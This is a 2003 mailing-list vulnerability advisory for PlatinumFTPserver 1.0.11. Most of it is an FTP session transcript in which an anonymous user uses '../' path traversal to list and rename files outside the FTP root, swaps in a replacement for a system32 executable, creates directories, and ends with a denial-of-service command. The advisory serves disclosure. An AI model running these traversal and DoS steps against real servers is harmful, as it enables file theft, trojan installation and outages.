Date: 24 Feb 2003 09:26:56 -0000
From: Pui Kin Ser <[email protected]>
To: [email protected]Subject: Vulnerability for Platinum FTP version 1.0.11
Vulnerability in PlatinumFTPserver V1.0.11
Vendor: PlatinumFTPserver (C)2002 BYTE/400 LTD
Discovered by: SER Pui Kin, Hong Kong
[email protected]
Date: 24 Feb 2003
Summary
-------------------
A vulnerability in Platinum FTP server is that it cannot stop users to
traverse the file system out of the FTP root directory "/". Meanwhile,
anonymous user can retrieve or replace any file in the FTP server. Trojan
house can be easily installed to the affected server.
The DOS vulnerability reported by Dennis Rand for Plantinum v1.0.7 has
not been fixed yet in v1.0.11.
Details
-------------------
Version affected:
* PlatinumFTPServer version 1.0.10, verion 1.0.11
Demonstration
-------------------
C:\testing>ftp localhost
Connected to ibm-kin.
220-PlatinumFTPserver V1.0.11
220-PlatinumFTPserver (C)2002 BYTE/400 LTD
220-
220 Enter login details
User (ibm-kin:(none)): anonymous
331 Password required for anonymous.
Password:
230-Send comments to [email protected]
230-Date 2/24/2003, Time 9:56:07 AM.
230 Storage available 8,671,645,696 Bytes.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 28 Feb 24 09:59 cmd3.exe
226 Listing complete.
ftp: 67 bytes received in 0.00Seconds 67000.00Kbytes/sec.
ftp> pwd
257 "/" is current directory.
ftp> dir \..
200 PORT command successful
500 /. or \. reference not allowed for security reasons.
########################################################
## To retrieve file directory information out of the FTP root directory
########################################################
ftp> dir ..
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 1406 Oct 10 23:38 3.ico
drwxr-xr-x 1 User Group 0 Feb 24 09:54 Backup
-rwxr-xr-x 1 User Group 90112 Aug 26 22:15 Clean.exe
-rwxr-xr-x 1 User Group 418816 Feb 22 06:19 Console.exe
-rwxr-xr-x 1 User Group 198315 Sep 3 03:47 FtpObjectHelp.chm
-rwxr-xr-x 1 User Group 46592 Dec 12 06:58
InstallService.exe
-rwxr-xr-x 1 User Group 15431 Jul 8 17:52 License.rtf
drwxr-xr-x 1 User Group 0 Feb 24 09:56 logs
-rwxr-xr-x 1 User Group 3224767 Jan 4 23:03
PlatinumFTPserver.chm
-rwxr-xr-x 1 User Group 141312 Feb 22 06:22
PlatinumFTPserverEngine.exe
-rwxr-xr-x 1 User Group 7406 Jul 19 23:51 Readme.ico
-rwxr-xr-x 1 User Group 27109 Feb 22 20:12 Readme.rtf
-rwxr-xr-x 1 User Group 69 Feb 22 11:54 reg.bat
-rwxr-xr-x 1 User Group 69904 Jun 24 18:02 RegPatch.exe
-rwxr-xr-x 1 User Group 43581 Feb 22 07:37 Releasenotes.rtf
drwxr-xr-x 1 User Group 0 Feb 24 10:04 root
-rwxr-xr-x 1 User Group 201728 Dec 11 07:09 ScriptEditor.exe
drwxr-xr-x 1 User Group 0 Feb 24 09:54 Scripts
-rwxr-xr-x 1 User Group 3036 Sep 1 15:37 TIPOFDAY.TXT
-rwxr-xr-x 1 User Group 468490 Jul 8 17:53 vbscript.chm
-rwxr-xr-x 1 User Group 61952 Aug 29 13:16 ViewLog.exe
-rwxr-xr-x 1 User Group 89600 Nov 23 04:00 ZipManager.exe
-rwxr-xr-x 1 User Group 92595 Sep 3 03:02 ZipObjectHelp.chm
226 Listing complete.
ftp: 1634 bytes received in 0.00Seconds 1634000.00Kbytes/sec.
ftp> dir ../../../../windows/system32/cmd*
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 375808 Aug 18 20:00 cmd.exe
-rwxr-xr-x 1 User Group 375808 Aug 18 20:00 cmd2.exe
-rwxr-xr-x 1 User Group 324608 Aug 29 18:40 cmdial32.dll
-rwxr-xr-x 1 User Group 41472 Aug 29 18:41 cmdl32.exe
-rwxr-xr-x 1 User Group 40505 Aug 18 20:00 cmdlib.wsc
226 Listing complete.
ftp: 342 bytes received in 0.00Seconds 342000.00Kbytes/sec.
########################################################
## To get the file cmd2.exe out of the FTP root
########################################################
ftp> get ../../../../windows/system32/cmd2.exe
200 PORT command successful
550 ../../../../windows/system32/cmd2.exe: No such file or directory.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 28 Feb 24 09:59 cmd3.exe
226 Listing complete.
ftp: 67 bytes received in 0.00Seconds 67000.00Kbytes/sec.
ftp> rename ../../../../windows/system32/cmd2.exe
To name cmd2.exe
350 Command OK - waiting for name
250 File/dir renamed to \cmd2.exe
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 375808 Aug 18 20:00 cmd2.exe
-rwxr-xr-x 1 User Group 28 Feb 24 09:59 cmd3.exe
226 Listing complete.
ftp: 134 bytes received in 0.00Seconds 134000.00Kbytes/sec.
########################################################
## To replace the cmd2.exe with the anonymous's program cmd3.exe
########################################################
ftp> rename cmd3.exe
To name ../../../../windows/system32/cmd2.exe
350 Command OK - waiting for name
250 File/dir renamed to \..\..\..\..\windows\system32\cmd2.exe
ftp> dir ../../../../windows/system32/cmd*
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 375808 Aug 18 20:00 cmd.exe
-rwxr-xr-x 1 User Group 28 Feb 24 09:59 cmd2.exe
-rwxr-xr-x 1 User Group 324608 Aug 29 18:40 cmdial32.dll
-rwxr-xr-x 1 User Group 41472 Aug 29 18:41 cmdl32.exe
-rwxr-xr-x 1 User Group 40505 Aug 18 20:00 cmdlib.wsc
226 Listing complete.
ftp: 342 bytes received in 0.00Seconds 342000.00Kbytes/sec.
ftp>
########################################################
## To create directory out of the FTP root
########################################################
ftp> pwd
257 "/" is current directory.
ftp> mkdir ../testing1
257 ../testing1 directory created
########################################################
## To DOS the FTP server. CPU will be 100% utilized
########################################################
ftp> cd @/..@/..
